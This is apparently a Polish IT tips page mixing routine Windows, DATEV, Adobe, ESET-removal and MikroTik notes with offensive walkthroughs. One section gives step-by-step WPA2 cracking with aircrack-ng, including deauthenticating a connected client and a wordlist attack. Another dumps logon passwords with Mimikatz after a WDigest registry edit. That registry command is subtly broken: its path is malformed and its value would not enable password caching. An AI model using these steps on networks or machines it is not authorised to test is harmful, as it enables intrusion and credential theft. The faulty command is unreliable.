Świetnym narzędziem do usuwania niepotrzebnego oprogramowania w Windows 11 jest Winutil, do ściągnięcia na stronie: https://github.com/ChrisTitusTech/winutil
https://www.youtube.com/watch?v=-E-WC_UvHXE
https://www.youtube.com/watch?v=B6TL3_GlIFA
Świetnym narzędziem do usuwania niepotrzebnego oprogramowania w Windows 11 jest Winutil, do ściągnięcia na stronie: https://github.com/ChrisTitusTech/winutil
https://www.youtube.com/watch?v=-E-WC_UvHXE
https://www.youtube.com/watch?v=B6TL3_GlIFA
W celu złamania hasła do sieci WiFi wykorzystany został w tym przypadku system Kali Linux w wersji 2025.2 oraz karta sieciowa Intel Dual Band Wireless-AC 8265.
W skrócie oto lista kroków jakie trzeba wykonać:
Skonfigurowanie karty w tryb monitorowania
airmon-ng check airmon-ng check kill airmon-ng start wlan0
Airmon utworzy nowy interfejs sieciowy, w tym przypadku o nazwie wlan0mon. Do wyświetlenia wszystkich interfejsów bezprzewodowych służy polecenie iwconfig.
Wyświetlenie wszystkich sieci bezprzewodowych w pobliżu
airodump-ng wlan0mon
Rozpoczęcie przechwytywania pakietów do pliku capture_file
airodump-ng wlan0mon --bssid MAC_ADDRESS_OF_AP_HERE -c CHANNEL_NUMBER_HERE -w ./capture_file
Rozłączenie aktualnie podłączonego klienta w celu przechwycenia pakietów handshake – nawiązujących połączenie:
aireplay-ng wlan0mon --deauth NUMBER_OF_PACKETS_EGZAPLE_20 -a MAC_ADDRESS_OF_AP_HERE -h MAC_ADDRESS_OF_COMPUTER_CONNECTED_TO_NETWORK_HERE
Po wyświetleniu napisu WPA handshake: MAC_ADDRESS_OF_AP można zakończyć przechwytywanie pakietów.
Łamanie hasła za pomocą narzędzia aircrack-ng
aircrack-ng -w FILE_WITCH_WORDLIST wpa2-01.cap
Wyłączenie trybu monitorowania karty sieciowej
airmon-ng stop wlan0mon
Restart serwisu
service network-manager start
Listy słownikowe do łamania haseł metodą bruteforce można pobrać pod adresem:
https://www.wirelesshack.org/wpa-wpa2-word-list-dictionaries.html
Narzędzie SharpUP zostało napisane przez Willa Schroedera znanego jako Harmj0y. Służy ono do wykrywania podatności pod kątem eskalacji uprawnień w systemie Windows. Wykrywa błędy w konfiguracji systemu, które mogą prowadzić do przejęcie praw administratora przez nieautoryzowanych użytkowników.
Kod źródłowy narzędzia SharpUp jest otwarty i możne go pobrać ze strony: https://github.com/GhostPack/SharpUp.
Kod można skompilować np. za pomocą Microsoft Visual Studio 2022 Community Edition.
Program należy uruchomić z linii komend poleceniem:
SharpUp.exe audit
Aby utworzyć kopię bezpieczeństwa programu DATEV Audit należy uruchomić DATEV SQL Manager (Start -> wpisać: dsqlm) i zamknąć bazę programu.
Następnie należy przekopiować katalog C:\ProgramData\DATEV\Daten w bezpieczne miejsce.
Najprostszym sposobem odinstalowania programu jest pobranie narzędzia deinstnacharbeitentool.exe ze strony: https://download.datev.de/download/deinstallationsnacharbeiten_v311/deinstnacharbeitentool.exe i uruchomienie go z poświadczeniami administratora.
Ostatnim krokiem jest usunięcie katalogu C:\ProgramData\DATEV-NetInfo
Ostatnio napotykane są coraz częstsze problemy z weryfikacją podpisu elektronicznego w plikach PDF. Zamiast zielonego „ptaszka” pojawia się znak zapytania, mówiący że Acrobat Reader nie może zweryfikować podpisu elektronicznego. Aby rozwiązać problem należy wczytać / zaktualizować listę zaufanych certyfikatów z serwera Adobe. Aby tego dokonać należy wejść w: Menu -> Preferencje -> Menadżer zaufania i zaznaczyć opcje (jeżeli nie są zaznaczone):
„Wczytaj zaufane certyfikaty z serwera Adobe AATL”
oraz
„Wczytaj zaufane certyfikaty z serwera Adobe EUTL”
Należy również kliknąć na przycisk „Uaktualnij teraz” przy obu w/w opcjach.
Następnie najlepiej wyłączyć i włączyć ponownie program Acrobat Reader.
Below script allows to remove ESET product from Windows 10 / 11 without system restart nor entering to Recovery Mode.
#WMI object refreshing net stop winmgmt /y winmgmt /resetrepository net start winmgmt # retriving GUID for ESET $eset = Get-CimInstance -ClassName Win32_Product | Where-Object { $_.Name -like "*ESET*" } $esetVersion = $eset.name $Win32_Product_query = "SELECT * FROM AntivirusProduct WHERE displayName = '$esetVersion'" $SecurityCenter2_query = Get-WmiObject -Namespace "root\SecurityCenter2" -Query "SELECT * FROM AntivirusProduct WHERE displayName = 'ESET Endpoint Security'" $SecurityCenter2_query2 = Get-WmiObject -Namespace "root\SecurityCenter2" -Query "SELECT * FROM AntivirusProduct WHERE displayName = 'ESET Security'" if ($eset) { # display GUID $eset | Select-Object Name, IdentifyingNumber # ESET deinstallation $msiGuid = $eset.IdentifyingNumber $msiexecArgs = "/x $msiGuid /quiet /norestart" Start-Process msiexec.exe -ArgumentList $msiexecArgs -Wait Write-Host "ESET has been successfully uninstalled." } else { Write-Host "ESET was not found on this system" -BackgroundColor Green; } if ($SecurityCenter2_query) { $SecurityCenter2_query | Remove-WMIObject Write-Host "ESET Endpoint Security record was found in the root\SecurityCenter2 namespace. The record has been deleted" -BackgroundColor Green; } if ($SecurityCenter2_query2) { $SecurityCenter2_query2 | Remove-WMIObject Write-Host "ESET Security record was found in the root\SecurityCenter2 namespace. The record has been deleted" -BackgroundColor Green; } #REMOVE POSSIBLE QUARANTINE FOLDERS $quarantine_folders = @( "C:\ProgramData\ESET\ESET NOD32 Antivirus\Quarantine", "C:\ProgramData\ESET\ESET Internet Security\Quarantine", "C:\User\AppData\Local\ESET\ESET Security" "C:\Users\Default\AppData\Local\ESET" ) foreach ($quarantine_folder in $quarantine_folders) { if (Test-Path $quarantine_folder) { try { Remove-Item -Path $quarantine_folder -Recurse -Force Write-Host "Folder: $quarantine_folder has been deleted." -ForegroundColor Green } catch { Write-Host "An error occurred while deleting a folder: $quarantine_folder $_" -ForegroundColor Red } } else { Write-Host "Folder $quarantine_folder not exist." -ForegroundColor Yellow } }
Przy instalacji Windows 11 na VMware ESXi 7.0 należy nacisnąć klawisze Shift+F10 przy wyborze języka instalacji. Otworzy się okno linii komend, w którym należy wpisać poniższe komendy a następnie zamknąć okno:
reg add HKLM\SYSTEM\Setup\LabConfig /v ByPassTPMCheck /d 1
opcjonalnie:
reg add HKLM\SYSTEM\Setup\LabConfig /v ByPassRAMCheck /d 1
reg add HKLM\SYSTEM\Setup\LabConfig /v ByPassSecureBootCheck /d 1
Link: https://www.robsteele.co/this-pc-cant-run-windows-11-on-esxi-7/
dodatkowo, można wydać polecenie: start ms-cxh:localonly w celu utworzenia konta lokalnego w systemie.
Wyciągnięcie roku z numeru PESEL:
=JEŻELI(WARTOŚĆ(FRAGMENT.TEKSTU(A1;3;2))>12;2000 + LEWY(A1;2);1900 + LEWY(A1;2))
Wyciągnięcie płci z numeru PESEL:
=JEŻELI(MOD(FRAGMENT.TEKSTU(A1;10;1);2)=0;"K";"M")
Aby za pomocą Mimikatz przechwycić wprowadzone do systemu poświadczenia należy włączyć w Windows przechowywania haseł w pamięci:
reg add HKLM\SYSTEM\CurrentControlSet\ControlSecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0
A następnie w Mimikatz wydać polecenie:
privilege:: debug sekurlsa::logonpasswords
Showing DNS properties and increasing Cache size:
ip/dns/print ip/dns/set cache-size=20480
Adding DNS lists
ip/dns/adlist add url=https://raw.githubusercontent.com/StevenBlack/hosts/master/hosts ssl-verify=no ip/dns/adlist add url=https://raw.githubusercontent.com/MajkiIT/polish-ads-filter/master/polish-pihole-filters/hostfile.txt ssl-verify=no ip/dns/adlist add url=https://raw.githubusercontent.com/MajkiIT/polish-ads-filter/master/polish-pihole-filters/Ad_filter_list_by_Disconnect.txt ssl-verify=no ip/dns/adlist add url=https://raw.githubusercontent.com/MajkiIT/polish-ads-filter/master/polish-pihole-filters/NoTrack_Tracker_Blocklist.txt ssl-verify=no